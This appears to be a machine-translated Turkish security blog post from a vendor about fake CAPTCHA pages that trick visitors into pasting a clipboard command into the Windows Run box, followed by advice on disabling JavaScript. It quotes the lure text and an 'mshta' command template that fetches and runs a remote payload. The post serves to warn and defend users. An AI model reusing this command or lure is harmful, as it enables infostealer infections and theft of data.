Sahte Captcha Web Siteleri Bilgi Stealers’ı yüklemek için panonuzu ele geçirin

Pano korsanı kullanan ve kurbanlara kendi makinelerine nasıl bulaşacakları konusunda talimat veren gittikçe daha fazla site var.

Bunun net olmak için önemsiz bir şey gibi gelebileceğini anlıyorum, ama görünüşe göre arkasındaki sosyal mühendislik oldukça sofistike.

İlk başta, bu saldırılar siber suçlulara hedeflenen bir şirkette bir dayanak sağlayabilecek insanları daha fazla hedefliyordu, ancak popülerlikleri o kadar çok büyüdü ki, şimdi herkes bunlardan birine girebilir.

Genellikle ziyaretçilere bir tür popüler içerik vaat eden bir web sitesinde başlar: filmler, müzik, resimler, haber makaleleri, adını siz koyun.

Kimse bir robot olmadıklarını kanıtlamaları istendiğinde iki kez düşünmeyecek.

Ancak bu yöntemin bir sonraki adımı normalde göreceğiniz şey değildir. Onay kutusunu kullanırsanız, şöyle görünen bir şeye iletilirsiniz:

“Bir robot olmadığınızı daha iyi kanıtlamak için lütfen:

1. Windows tuşunu + R’yi basılı tutun.
2. Doğrulama pencerelerinde Ctrl + V tuşlarına basın.
3. Bitirmek için klavyenizdeki Enter tuşuna basın.

Gözlemleyecek ve kabul edeceksiniz:
“Ben bir robot değilim – Recaptcha Doğrulama Kimliği: 8253”

Doğrulamayı bitirmek için yukarıdaki adımları gerçekleştirin. ”

Bu talimatlar yeterince zararsız görünse de, adımları izlerseniz, kendinizi kötü amaçlı yazılımlarla enfekte edeceksiniz – büyük olasılıkla bir bilgi çalma. Arka planda, ziyaret ettiğiniz web sitesi panonuza bir komut kopyaladı. Krom bazlı tarayıcılarda (neredeyse tüm popüler olanlardır) bir web sitesi yalnızca izninizle panonuza yazabilir. Ancak Windows, ilk ekrandaki onay kutusunu kontrol ettiğinizde bunu kabul ettiğiniz varsayımı altındaydı.

İstemdeki engellerin size söylediği şey:

1. Windows’ta Çalıştır iletişim kutusunu açın.
2. Panonuzun içeriğini o iletişim kutusuna yapıştırın.
3. Az önce yapıştırdığınız komutu çalıştırın.

Neyi “gözlemleyeceğiniz” hakkında yalan söylemiyorlar, ama size söylemedikleri şey, yapıştırdığınız şeyin sadece son kısmı ve gördüğünüz şey gerçekten komutun bir parçası değil, sadece arkasında bir yorum.

Ancak normal koşullar altında, görünür olacak.

Hedefin yapıştırması talimatı verilen ilk kısmı varyasyonlardır – bazen gizlenmiş -:

mshta https://{malicious.domain}/media.file

MSHTA, meşru Windows yürütülebilir MSHTA.EXE’yi tetikleyecek bir komuttur. Ancak MSHTA, kötü amaçlı medya dosyasını belirtilen alandan getirecek ve çalıştıracaktır. Medya dosyasının adı mükemmel görünebilir. MP3, MP4, JPG, JPEG, SWF, HTML gördük ve başka olasılıklar olacak.

Dosyaların gerçekte ne olduğu, görünmez bir şekilde çalışacak ve gerçek yükü indirecek kodlanmış bir PowerShell komutudur. Bir süredir, indirildiğimiz kötü amaçlı yazılım neredeyse sadece Lumma Stealer Infostealer’dı, ancak son zamanlarda Sectoprat’ı yaymak için aynı yöntemi kullanan kampanyalar da bulduk. Bunların her ikisi de makinenizden hassas verileri çalmak için tasarlanmıştır.

Nasıl Güvenli Kalınır

Kendinizi düşme kurbanından bu ve benzer yöntemlere karşı korumak için yapabileceğiniz birkaç şey var:

• Ziyaret ettiğiniz bazı web siteleri tarafından sağlanan talimatları düşünmeden izlemeyin.
• Kötü amaçlı web sitelerini ve komut dosyalarını engelleyen etkin bir kötü amaçlı yazılım önleme çözümü kullanın.
• Kötü niyetli alanları ve dolandırıcılığı engelleyen bir tarayıcı uzantısı kullanın.
• Bilinmeyen web sitelerini ziyaret etmeden önce tarayıcınızdaki JavaScript’i devre dışı bırakın.

Pano erişimi bir JavaScript işlevi belgesi ile tetiklenir. JavaScript’i devre dışı bırakmak bunun olmasını engelleyecektir, ancak düzenli olarak ziyaret ettiğiniz birçok web sitesini kırması dezavantajına sahiptir. Yaptığım şey farklı amaçlar için farklı tarayıcılar kullanmak.

Birkaç popüler tarayıcıda JavaScript’in nasıl devre dışı bırakılacağına dair adım adım talimatlar:

JavaScript’te nasıl devre dışı bırakılır Krom

• Chrome’u açın ve sağ üst köşedeki üç noktalı menü simgesine tıklayın.
• Seçme Ayarlar açılır menüden.
• Sol tarafta tıklayın Gizlilik ve Güvenlik.
• Tıklayın Site ayarıS.
• Aşağı kaydırın İçerik Bölüm ve tıklayın Javascript.

Anahtarı Sitelerin JavaScript kullanmasına izin vermeyin ile Tüm siteler için javascript’i devre dışı bırakın. Ayrıca tıklayarak JavaScript’i engellemek veya izin vermek için belirli siteler de ekleyebilirsiniz. Eklemek altında Blok veya İzin Ver bölümler.

Firefox’ta JavaScript’i nasıl devre dışı bırakılır

• Firefox’u açın ve sağ üst köşedeki menü düğmesine (üç yatay satır) tıklayın.
• Seçme Ayarlar açılır menüden.
• Kaydırın Gizlilik ve Güvenlik Sol tarafta panel.
• Bul İzin bölüm ve JavaScript ayarını bulun.
• Yandaki kutuyu işaretleyin JavaScript’i Etkinleştir JavaScript’i devre dışı bırakmak için.
• Değişikliklerin yürürlüğe girmesi için gerekirse Firefox’u yeniden başlatın.

Operada javascript nasıl devre dışı bırakılır

• Opera başlatın ve Ayarlar simgesine tıklayın.
• Seçme Gizlilik ve Güvenlik Seçeneklerden.
• Tıklayın Site Ayarları.
• Seçin Javascript seçenek.
• Seçmek Sitelerin JavaScript kullanmasına izin vermeyin Tüm siteler için JavaScript’i devre dışı bırakmak için.

Belirli siteler için JavaScript’i devre dışı bırakmak için tıklayın Eklemek altında JavaScript kullanmasına izin verilmiyor Bölüm ve sitenin URL’sine girin.

JavaScript’i kenarda nasıl devre dışı bırakılır

• Microsoft Edge’i açın ve sağ üst köşedeki üç noktalı menü simgesine tıklayın.
• Seçme Ayarlar açılır menüden.
• Sol kenar çubuğunda tıklayın Kurabiye Ve Site İzinleri.
• Aşağı kaydırın Tüm İzinler Bölüm ve JavaScript’i seçin.

JavaScript’i devre dışı bırakmak için anahtarı değiştirin. Ayrıca, izin veya blok listelerine ekleyerek tek tek siteler için JavaScript ayarlarını da yönetebilirsiniz.

Sadece tehditler hakkında rapor vermiyoruz, onları kaldırıyoruz

Siber güvenlik riskleri asla bir başlığın ötesine yayılmamalıdır. Bugün MalwareBebytes’i indirerek tehditleri cihazlarınızdan uzak tutun.